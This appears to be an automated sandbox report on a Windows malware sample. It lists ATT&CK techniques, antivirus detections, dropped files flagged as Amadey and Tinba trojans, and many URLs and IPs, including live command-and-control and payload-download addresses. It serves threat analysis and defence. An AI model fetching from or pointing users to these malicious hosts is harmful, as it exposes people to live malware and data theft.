Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Masquerading	Proc Filesystem	361 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	361 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	112 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Rundll32	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	37%	Virustotal		Browse
file.exe	29%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\clip[1].dll	47%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll	47%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1005203011\clip.dll	47%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll	47%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	37%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label	Link
https://edgeassetservice.azure	0%	Avira URL Cloud	safe
http://185.215.113.209/Fru7Nk9/index.php.	0%	Avira URL Cloud	safe
http://185.215.113.206/c4becf79229cb002.phpche	100%	Avira URL Cloud	malware
https://navygenerayk.store/lf	100%	Avira URL Cloud	malware
http://185.215.113.206D	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php0001	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/nss3.dll	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpncodedPM	100%	Avira URL Cloud	malware
https://navygenerayk.store/A	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php3.43	100%	Avira URL Cloud	malware
https://edgeassetservice.azure	0%	Virustotal		Browse
http://185.215.113.209/Fru7Nk9/index.phpF	0%	Avira URL Cloud	safe
https://navygenerayk.store/X	100%	Avira URL Cloud	malware
http://185.215.113.2063	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exeGB	100%	Avira URL Cloud	phishing
185.215.113.206/c4becf79229cb002.php	100%	Avira URL Cloud	malware
http://185.215.113.206lfons	0%	Avira URL Cloud	safe
http://185.215.113.16/Fru7Nk9/Plugins/clip.dll:::Main	100%	Avira URL Cloud	phishing
http://185.215.113.206/fjnmnfpi	100%	Avira URL Cloud	malware
http://185.215.113.43/ViewSizePreferences.SourceAumid$w	100%	Avira URL Cloud	malware
https://navygenerayk.store/(	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpIa9	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phptent-T	100%	Avira URL Cloud	malware
https://navygenerayk.store/9	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/msvcp140.dllf	100%	Avira URL Cloud	malware
http://185.215.113.16/Fru7Nk9/Plugins/clip.dll:::Mainos.dll	100%	Avira URL Cloud	phishing
http://185.215.113.43/c00b58987e8e4f4b2846d934f48b15eaa10a45	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpaa	100%	Avira URL Cloud	malware
http://185.215.113.209/	0%	Avira URL Cloud	safe
http://185.215.113.16/luma/random.exe2	100%	Avira URL Cloud	phishing
http://185.215.113.206/c4becf79229cb002.phpBr	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpU	100%	Avira URL Cloud	phishing
http://185.215.113.206/c4becf79229cb002.php/h	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpX	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php)a	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpf	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpl	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php6	100%	Avira URL Cloud	malware
http://185.215.113.206/2c2e-da81-46d0-b6b6-535557bcc5faXX	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/mozglue.dll	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpR;	100%	Avira URL Cloud	malware
https://navygenerayk.store/Fo	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php(	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php-	100%	Avira URL Cloud	malware
https://navygenerayk.store/apihpcRGN	100%	Avira URL Cloud	malware
http://185.2w5	0%	Avira URL Cloud	safe
http://185.215.113.206/SSC:	100%	Avira URL Cloud	malware
http://185.215.113.209/Fru7Nk9/index.phpST	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
plus.l.google.com	142.250.186.174	true	false	high
play.google.com	216.58.206.78	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.244.18.27	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.google.com	142.250.185.68	true	false	high
googlehosted.l.googleusercontent.com	172.217.16.193	true	false	high
sni1gl.wpc.nucdn.net	152.199.21.175	true	false	high
navygenerayk.store	188.114.97.3	true	false	high
js.monitor.azure.com	unknown	unknown	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
mdec.nelreports.net	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
presticitpo.store	unknown	unknown	false	high
founpiuer.store	unknown	unknown	false	high
thumbystriw.store	unknown	unknown	false	high
necklacedmny.store	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high
crisiwarny.store	unknown	unknown	false	high
fadehairucw.store	unknown	unknown	false	high
browser.events.data.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/	false		high
fadehairucw.store	false		high
https://navygenerayk.store/api	false		high
https://c.msn.com/c.gif?rnd=1731210922530&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=1b1c38cab0134bc7a8e603f795c6d608&activityId=1b1c38cab0134bc7a8e603f795c6d608&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=7D43837CDE984B5C93357FDF0CAA9AAC&MUID=1C457A5C69C96D7328066F6F68476CEB	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dll	true	Avira URL Cloud: malware	unknown
founpiuer.store	false		high
185.215.113.206/c4becf79229cb002.php	true	Avira URL Cloud: malware	unknown
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731210926052&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js	false		high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0	false		high
https://sb.scorecardresearch.com/b2?rn=1731210922530&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1C457A5C69C96D7328066F6F68476CEB&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false		high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
presticitpo.store	false		high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	true	Avira URL Cloud: malware	unknown
https://sb.scorecardresearch.com/b?rn=1731210922530&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1C457A5C69C96D7328066F6F68476CEB&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false		high
http://185.215.113.206/68b591d6548ec281/mozglue.dll	true	Avira URL Cloud: malware	unknown
https://c.msn.com/c.gif?rnd=1731210922530&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=1b1c38cab0134bc7a8e603f795c6d608&activityId=1b1c38cab0134bc7a8e603f795c6d608&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0	false		high
http://185.215.113.16/steam/random.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919607246.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919514089.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116779772.0000000005922000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3456431500.0000000005BBD000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://edgeassetservice.azure	000003.ldb.9.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919607246.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919514089.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116779772.0000000005922000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3456431500.0000000005BBD000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348404528.0000000000DED000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3168645780.0000000001160000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583354047.0000000005B80000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583089738.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpche	file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/Youssef1313	chromecache_573.4.dr	false		high
http://185.215.113.43/Zu7JuNko/index.phpnu	skotes.exe, 00000018.00000002.5411293515.0000000001259000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.209/Fru7Nk9/index.php.	rundll32.exe, 00000021.00000002.5403786166.00000000032B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/	manifest.json0.9.dr	false		high
https://mail.google.com	000003.ldb.9.dr	false		high
https://navygenerayk.store/lf	6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md	chromecache_573.4.dr	false		high
http://185.215.113.206D	6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.php0001	skotes.exe, 00000018.00000002.5411293515.0000000001259000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/feedback/report?space=61	chromecache_573.4.dr, chromecache_609.4.dr	false		high
http://185.215.113.43/Zu7JuNko/index.phpncodedPM	skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://navygenerayk.store/A	6ca8f7e5e2.exe, 0000002B.00000003.3534273958.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3452936282.0000000005B55000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3535383922.0000000005B56000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3452508746.0000000005B55000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3515443201.0000000005B51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.php3.43	skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.209/Fru7Nk9/index.phpF	rundll32.exe, 0000001E.00000002.5403588719.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://navygenerayk.store/	6ca8f7e5e2.exe, 0000002B.00000003.3535165376.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3535383922.0000000005B56000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3360654673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://navygenerayk.store/X	6ca8f7e5e2.exe, 00000023.00000003.3250771327.0000000001162000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3138038343.0000000001163000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.2063	6ca8f7e5e2.exe, 0000002B.00000002.3769018409.000000000146A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/steam/random.exeGB	skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Fru7Nk9/Plugins/clip.dll:::Main	skotes.exe, 00000018.00000002.5411293515.0000000001219000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206lfons	file.exe, 00000000.00000002.2407206885.0000000000655000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.206/fjnmnfpi	6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001175000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://navygenerayk.store/(	6ca8f7e5e2.exe, 00000023.00000003.3138038343.0000000001163000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/ViewSizePreferences.SourceAumid$w	skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://drive-daily-2.corp.google.com/	manifest.json0.9.dr	false		high
http://185.215.113.43/Zu7JuNko/index.phpIa9	skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919607246.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919514089.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116779772.0000000005922000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3456431500.0000000005BBD000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phptent-T	skotes.exe, 00000018.00000002.5411293515.00000000012B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://navygenerayk.store/9	6ca8f7e5e2.exe, 0000002B.00000003.3533159002.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3535165376.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-1.corp.google.com/	manifest.json0.9.dr	false		high
http://185.215.113.206/68b591d6548ec281/msvcp140.dllf	file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://drive-daily-5.corp.google.com/	manifest.json0.9.dr	false		high
http://185.215.113.16/Fru7Nk9/Plugins/clip.dll:::Mainos.dll	skotes.exe, 00000018.00000002.5411293515.0000000001219000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.209/	rundll32.exe, 0000001A.00000002.5403969374.00000000032F0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.5403588719.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000021.00000002.5403786166.00000000032C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000027.00000002.5403295633.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/c00b58987e8e4f4b2846d934f48b15eaa10a45	skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/adegeo	chromecache_573.4.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	file.exe, 00000000.00000003.2347934776.00000000234C0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348404528.0000000000DED000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3168645780.0000000001160000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583354047.0000000005B80000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583089738.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpaa	skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpded	skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	manifest.json.9.dr	false		high
http://185.215.113.16/luma/random.exe2	skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://drive-preprod.corp.google.com/	manifest.json0.9.dr	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348404528.0000000000DED000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3168645780.0000000001160000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583354047.0000000005B80000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583089738.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exe	6ca8f7e5e2.exe, 0000001C.00000003.3134891644.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000002.3229646487.0000000001290000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001110000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore/	manifest.json.9.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpBr	9305c7ab92.exe, 00000022.00000002.3043088426.0000000000C35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNs	000003.ldb.9.dr	false		high
http://185.215.113.43/Zu7JuNko/index.phpU	skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf	chromecache_573.4.dr	false		high
http://185.215.113.206/c4becf79229cb002.php/h	6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001166000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpX	skotes.exe, 00000018.00000002.5411293515.00000000012B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
